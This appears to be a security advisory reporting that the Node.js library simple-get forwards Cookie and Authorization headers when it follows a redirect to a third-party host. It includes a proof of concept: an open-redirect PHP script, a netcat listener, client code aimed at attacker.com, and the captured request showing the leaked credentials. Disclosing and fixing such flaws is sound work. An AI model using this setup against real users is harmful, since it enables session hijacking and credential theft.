Cookie header leaked to a third-party site, allowing the victim's account to be hijacked
When fetching a remote URL with a Cookie header, if the response carries a Location header, simple-get follows that URL and fetches it with the same cookie. The cookie is therefore leaked to the third party.
Example: you fetch example.com with a cookie and the response redirects to attacker.com; the redirect target is then fetched with the provided cookie, so the cookie for example.com is leaked to attacker.com.
Cookies are the standard way to authenticate to a web app, and they must not be leaked to other sites. Browsers follow the same-origin policy, so when a redirect happens the browser does not send example.com's cookie to attacker.com.
If you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ it will redirect to http://attacker.com:8182/.
First set up a web server hosting redirect.php and a netcat listener:
//redirect.php
<?php
$url=$_GET["url"];
header("Location: $url");
/* Make sure that code below does not get executed when we redirect. */
exit;
?>
nc -lnvp 8182
Then run the code below:
// simple-get must be required before calling get()
const get = require('simple-get')

get({
  url: 'http://mysite.com/redirect.php?url=http://attacker.com:8182',
  method: 'POST',
  body: 'this is the POST body',
  // simple-get accepts all options that node.js `http` accepts
  // See: http://nodejs.org/api/http.html#http_http_request_options_callback
  headers: {
    'user-agent': 'my cool app',
    'Authorization': 'Basic asdada=',
    'Cookie': 'asdad=asda'
  }
}, function (err, res) {
  if (err) throw err
  // All properties/methods from http.IncomingResponse are available,
  // even if a gunzip/inflate transform stream was returned.
  // See: http://nodejs.org/api/http.html#http_http_incomingmessage
  res.setTimeout(10000)
  console.log(res.headers)
  res.on('data', function (chunk) {
    // `chunk` is the decoded response, after it's been gunzipped or inflated
    // (if applicable)
    console.log('got a chunk of the response: ' + chunk)
  })
})
Request received on the attacker's netcat listener:
Connection from 127.0.0.1 35860 received!
GET / HTTP/1.1
accept-encoding: gzip, deflate
user-agent: my cool app
authorization: Basic asdada=
cookie: asdad=asda
Host: localhost:8182
Connection: close
So, here I provided the Cookie/Authorization headers for mysite.com, but due to the redirect they leak to the third-party site attacker.com.
If the domain of the provided URL and the domain of the redirect URL are the same, the Cookie/Authorization headers can be sent to the redirected URL. If the two domains are not the same, the redirect target is a third-party site, so the Cookie/Authorization headers should not be sent.